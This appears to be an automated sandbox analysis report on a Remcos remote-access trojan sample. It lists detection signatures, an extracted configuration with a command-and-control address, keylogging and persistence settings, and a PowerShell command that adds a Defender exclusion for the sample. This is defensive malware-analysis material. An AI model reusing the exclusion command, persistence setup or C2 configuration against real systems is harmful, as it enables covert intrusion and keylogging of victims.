                Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7328, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7412, ProcessName: svchost.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Graias\graias.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4XYAW8PbZH.exe, ProcessId: 2816, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-O844B9
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4XYAW8PbZH.exe", ParentImage: C:\Users\user\Desktop\4XYAW8PbZH.exe, ParentProcessId: 6976, ParentProcessName: 4XYAW8PbZH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", ProcessId: 2536, ProcessName: powershell.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7328, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7412, ProcessName: svchost.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4XYAW8PbZH.exe", ParentImage: C:\Users\user\Desktop\4XYAW8PbZH.exe, ParentProcessId: 6976, ParentProcessName: 4XYAW8PbZH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", ProcessId: 2536, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7328, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7412, ProcessName: svchost.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: CC 5F EF 95 52 EC 1E E1 CA 3B DB 36 C6 90 98 6F F2 B2 EE 7D D9 55 DE 98 DA B0 14 BE 23 8B B2 A6 5E C6 CF 30 9C 82 F7 90 AE DF 71 5A C6 2D 2B ED 3E 5C 1B A5 E3 5D AE 39 5E 59 31 08 F4 CA E6 2B BA 34 A0 37 84 D9 A7 16 09 0E C6 14 B2 0C FB 58 78 BA B3 DF 78 0D 8C 08 09 07 A7 A5 D5 53 48 D3 1B 9D , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, ProcessId: 7328, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-O844B9\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T18:41:57.412631+010020327761Malware Command and Control Activity Detected192.168.2.449734185.234.72.2154444TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T18:41:58.049544+010020327771Malware Command and Control Activity Detected185.234.72.2154444192.168.2.449734TCP
                2025-01-04T18:44:15.459474+010020327771Malware Command and Control Activity Detected185.234.72.2154444192.168.2.449734TCP
                2025-01-04T18:46:15.509845+010020327771Malware Command and Control Activity Detected185.234.72.2154444192.168.2.449734TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T18:41:59.200663+010028033043Unknown Traffic192.168.2.449737178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeReversingLabs: Detection: 68%
                Multi AV Scanner detection for submitted file
                Source: 4XYAW8PbZH.exeVirustotal: Detection: 59%Perma Link
                Source: 4XYAW8PbZH.exeReversingLabs: Detection: 68%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 4XYAW8PbZH.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_0043294A
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7f932f94-f

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00406764 _wcslen,CoGetObject,3_2_00406764
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: 4XYAW8PbZH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4XYAW8PbZH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Xml.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbxX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdbX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbAccessibility.dllD source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb4 source: WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdbMZ source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdbl source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdbP source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040B335
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,3_2_0041B43F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040B53A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,3_2_004089A9
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,3_2_00406AC2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,3_2_00407A8C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00418C79
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,3_2_00408DA7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00406F06
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppDataJump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49734 -> 185.234.72.215:4444
                Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 185.234.72.215:4444 -> 192.168.2.4:49734
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.234.72.215
                Source: global trafficTCP traffic: 192.168.2.4:49734 -> 185.234.72.215:4444
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49737 -> 178.237.33.50:80
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00426107 recv,3_2_00426107
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
                Source: 4XYAW8PbZH.exe, graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                Source: graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp~
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chromecache_283.17.drString found in binary or memory: http://schema.org/Organization
